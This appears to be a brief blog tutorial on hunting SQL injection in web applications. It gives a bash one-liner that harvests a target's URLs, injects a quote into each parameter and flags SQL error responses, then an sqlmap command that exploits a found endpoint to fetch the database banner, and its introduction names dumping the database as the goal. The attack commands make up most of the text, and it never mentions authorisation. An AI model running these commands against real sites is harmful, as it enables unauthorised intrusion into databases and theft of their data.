How to find SQL Injection using a simple technique

$

Introduction :

In this article, I’ll explore how to find SQL Injection in a simple way and how to dump the database later using sqlmap.

Checking for SQL Injection Vulnerability :

1. We will use the below one-liner bash command

$ echo "http://<target>/" | gau | uro | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx -mr ".*SQL.*|.*syntax.*|.*error.*"

It seems we now have some endpoints that may be vulnerable to SQL injection.

Now we are going to the next step.

2. Explore the endpoints.

Now, it seems from the response errors, these endpoints are vulnerable to SQL injection.

3. Exploit the vulnerable endpoints we will going to use the sqlmap.

$ sqlmap -u "http://<target>/sqli?param=A" -p param --dbms=MSSQL --level 1 --risk 1 --banner

It seems that now we are able to get the database banner and exploit the SQL injection properly.